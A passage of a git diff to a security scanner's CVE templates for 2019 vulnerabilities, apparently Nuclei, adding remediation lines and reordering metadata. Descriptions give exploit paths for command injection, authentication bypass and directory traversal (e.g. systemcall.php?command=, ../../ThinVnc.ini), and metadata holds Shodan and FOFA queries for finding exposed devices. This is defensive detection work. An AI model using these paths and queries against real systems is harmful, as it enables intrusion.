direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: - https://www.exploit-db.com/exploits/47760 - https://nvd.nist.gov/vuln/detail/CVE-2019-17270 @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-17270 cwe-id: CWE-78 epss-score: 0.94092 - cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* epss-percentile: 0.98826 + cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yachtcontrol diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index a14fed3bd1..67535f5850 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + remediation: | + Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47467 - https://nvd.nist.gov/vuln/detail/CVE-2019-17382 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.25064 - cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* epss-percentile: 0.9605 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index e205ffca3f..fc4f549c29 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). + remediation: | + Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. reference: - https://github.com/evi1code/Just-for-fun/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-17418 cwe-id: CWE-89 epss-score: 0.43984 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* epss-percentile: 0.96882 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 0f21492478..7319970a5f 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + remediation: | + Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. reference: - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-17444 cwe-id: CWE-521 epss-score: 0.07015 - cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* epss-percentile: 0.9309 + cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 - framework: "-" vendor: jfrog product: artifactory + framework: "-" tags: cve,cve2019,jfrog,default-login http: diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index 9b406d4397..6638f1f6dd 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: Kirona Dynamic Resource Scheduler is susceptible to information disclosure. An unauthenticated user can directly access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd), which contains sensitive information with exposed SQL queries, such as database version, table name, and column name. + remediation: | + Apply the latest patch or update provided by the vendor to fix the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/47498 - https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS%205.5.3.5%20Multiple%20Vulnerabilities @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-17503 cwe-id: CWE-425 epss-score: 0.00433 - cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* epss-percentile: 0.71395 + cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kirona diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index f151a8daf0..8a6121338d 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + remediation: | + Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability. reference: - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py - https://nvd.nist.gov/vuln/detail/CVE-2019-17506 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-17506 cwe-id: CWE-306 epss-score: 0.90125 - cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* epss-percentile: 0.98375 + cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 26b8cd34e6..ff76f21cb2 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../. + remediation: | + Upgrade Jiangnan Online Judge to a patched version or apply the necessary security patches to fix the Local File Inclusion vulnerability. reference: - https://github.com/shi-yang/jnoj/issues/53 - https://nvd.nist.gov/vuln/detail/CVE-2019-17538 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-17538 cwe-id: CWE-22 epss-score: 0.00838 - cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* epss-percentile: 0.79928 + cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jnoj diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 90017eb190..15c6832f31 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,madrobot severity: high description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + remediation: | + Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. reference: - https://issues.apache.org/jira/browse/SOLR-13971 - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-17558 cwe-id: CWE-74 epss-score: 0.97543 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* epss-percentile: 0.99991 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: apache diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index aa36e4b524..6abec75f2e 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file"). + remediation: | + Update Popup-Maker plugin to version 1.8.12 or later. reference: - https://wpscan.com/vulnerability/9907 - https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/ @@ -18,15 +20,15 @@ info: cve-id: 'CVE-2019-17574' cwe-id: CWE-639 epss-score: 0.14192 - cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94987 + cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - publicwww-query: "/wp-content/plugins/popup-maker/" - framework: wordpress + max-request: 2 vendor: code-atlantic product: popup_maker + framework: wordpress + publicwww-query: "/wp-content/plugins/popup-maker/" tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass http: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index f4ef2abd0a..0623bb2b0e 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + remediation: | + Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.50347 - cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* epss-percentile: 0.9709 + cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-1414548363 verified: true + max-request: 1 vendor: cybelsoft product: thinvnc + shodan-query: http.favicon.hash:-1414548363 tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive http: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 972dc249ef..806612ff4e 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: critical description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system. + remediation: | + Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-1821 cwe-id: CWE-20 epss-score: 0.96882 - cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* epss-percentile: 0.99577 + cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"prime infrastructure" vendor: cisco product: evolved_programmable_network_manager + shodan-query: http.title:"prime infrastructure" tags: packetstorm,cve,cve2019,rce,fileupload,unauth,intrusive,cisco http: diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index dc15d6313b..c190c882cb 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + remediation: | + Update the firmware of the Xiaomi Mi WiFi R3G routers to the latest version, which includes a fix for the local file inclusion vulnerability. reference: - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-18371 cwe-id: CWE-22 epss-score: 0.02272 - cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.88207 + cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mi diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index f703ea0056..c391a13b40 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. + remediation: | + Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability. reference: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* epss-percentile: 0.52069 + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 67048a5f59..09fa772cd7 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + remediation: | + Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability. reference: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-18394 cwe-id: CWE-918 epss-score: 0.5914 - cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* epss-percentile: 0.97299 + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index 47aa383dcc..fd9799d916 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + remediation: | + Apply the latest patch or update to a version that is not affected by this vulnerability. reference: - https://atomic111.github.io/article/secudos-domos-directory_traversal - https://vuldb.com/?id.144804 @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-18665 cwe-id: CWE-22 epss-score: 0.0855 - cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* epss-percentile: 0.93623 + cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: secudos diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 3f9a2656b5..09704a49b5 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -5,6 +5,8 @@ info: author: idealphase severity: critical description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + remediation: | + Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability. reference: - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-18818 cwe-id: CWE-640 epss-score: 0.88411 - cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* epss-percentile: 0.98263 + cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: strapi diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index d4189c57da..ec442c5fd8 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface. + remediation: | + Apply the latest firmware update provided by Allied Telesis to fix the vulnerability. reference: - https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html - https://pastebin.com/dpEGKUGz @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-18922 cwe-id: CWE-22 epss-score: 0.16768 - cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.95348 + cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alliedtelesis diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 6a66a42b94..37e513735a 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -6,21 +6,21 @@ info: severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. reference: - https://seclists.org/bugtraq/2019/Nov/23 - https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-18957 - http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html - http://seclists.org/fulldisclosure/2019/Nov/4 - remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-18957 cwe-id: CWE-79 epss-score: 0.00247 - cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* epss-percentile: 0.61933 + cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 1b6944941c..6d6f9b021b 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. + remediation: | + Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1898 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 epss-score: 0.06482 - cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.928 + cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="-646322113" verified: true max-request: 1 vendor: cisco product: rv110w_firmware + fofa-query: icon_hash="-646322113" tags: cve,cve2019,cisco,router,iot http: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 99ea844c17..a42be1d187 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter. + remediation: | + Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* epss-percentile: 0.57549 + cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: heroplugins product: hero_maps_premium + framework: wordpress tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps http: diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index db0f39cfa3..1aef5731d3 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript. + remediation: | + Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/harshit-shukla/CVE-2019-19368/ - https://www.maxum.com/Rumpus/Download.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-19368 cwe-id: CWE-79 epss-score: 0.00625 - cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* epss-percentile: 0.76278 + cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: maxum diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 9bcec51f8a..7a29dfff3c 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability. reference: - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect - https://www.exploit-db.com/exploits/47118 @@ -17,15 +19,15 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.90351 + cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: "/config/log_off_page.htm" - censys-query: "services.http.response.headers.location: /config/log_off_page.htm" + max-request: 1 vendor: cisco product: sg200-50_firmware + shodan-query: "/config/log_off_page.htm" + censys-query: "services.http.response.headers.location: /config/log_off_page.htm" tags: cve,cve2023,redirect,cisco http: diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 76506e3561..01474400e2 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -5,6 +5,8 @@ info: author: organiccrap,geeknik severity: critical description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. + remediation: | + Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability. reference: - https://support.citrix.com/article/CTX267027 - https://nvd.nist.gov/vuln/detail/CVE-2019-19781 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-19781 cwe-id: CWE-22 epss-score: 0.97541 - cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:* epss-percentile: 0.9999 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index 972949af09..5b69c5c114 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-19824 cwe-id: CWE-78 epss-score: 0.96631 - cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99466 + cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: totolink diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 382590b1bc..c30a944fb2 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL. + remediation: | + Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://cinzinga.github.io/CVE-2019-19908/ - http://ciprianmp.com/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-19908 cwe-id: CWE-79 epss-score: 0.00622 - cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* epss-percentile: 0.76214 + cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - google-query: inurl:"/plus/pass_reset.php" + max-request: 1 vendor: ciprianmp product: phpmychat-plus + google-query: inurl:"/plus/pass_reset.php" tags: cve,cve2019,phpMyChat,xss http: diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index ac0a24c888..df11994ce1 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -5,6 +5,8 @@ info: author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: | + Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/48698 - https://wpvulndb.com/vulnerabilities/9946 @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-19985 cwe-id: CWE-862 epss-score: 0.08255 - cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93525 + cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: icegram product: email_subscribers_\&_newsletters + framework: wordpress tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve http: diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 